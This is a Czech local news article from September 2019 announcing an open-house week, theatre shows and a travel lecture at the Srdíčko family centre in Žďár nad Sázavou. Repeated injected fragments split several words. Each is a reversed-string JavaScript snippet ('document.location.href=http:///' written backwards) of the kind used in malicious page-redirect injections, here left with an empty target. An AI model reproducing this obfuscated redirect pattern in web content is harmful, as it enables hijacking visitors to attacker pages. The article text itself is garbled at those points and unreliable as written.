Rainbow page separator

Ve žďárském Srdíčku startuje týden otevřených dveří

Pondělí, 16. září 2019

Žďár nad Sázavou / Týden otevřených dveří se ve dnech 16. až 24. září uskuteční ve žďárském rodinném centru Srdíčko. Kromě návštěvy aktivit centra mohou zájemci přijít i na doprovodné kulturní akce, které jsou součástí projektu nazvaného Srdíčko kulturní. „V týdnu otevřených dveří bude zdarma přístupná většina našich programů. Rodiče se k nám mohou se svými dětmi podívat, vyzkoušet si jednotlivé aktivity, seznámit se s lek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torkami i provozem centra,“ uvedla vedoucí Srdíčka, které funguje již jedenáctým rokem v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách žďárské polikliniky a je provozováno Kolpingovým dílem České republiky, Jana Kamarádová.
Ke zpestření týdne otevřených dveří, který podpořila také žďárská radnice, přichystali zaměstnanci rovněž doprovodné akce. V pondělí [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude divadelní představení Jak šel pejsek do školy v režii divadla Úsměv Ludmily Frištenské, které je určeno dětem od dvou let věku. „V úterý odpoledne zveme i starší děti na představení žďárské divadelní společnosti Effrenata Pohádky ze Špalíčku,“ doplnila Jana Kamarádová.
Středeční kulturní akce je především pro rodiče, seniory i další zájemce z řad veřejnosti. Na programu bude ces[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovatelská přednáška Anny Novotné nazvaná Moje cesta do Izraele. Projekt Srdíčko kulturní uzavře ve čtvrtek odpoledne pohádka s jednou loutkou a dvěma herci v režii divadla Totem.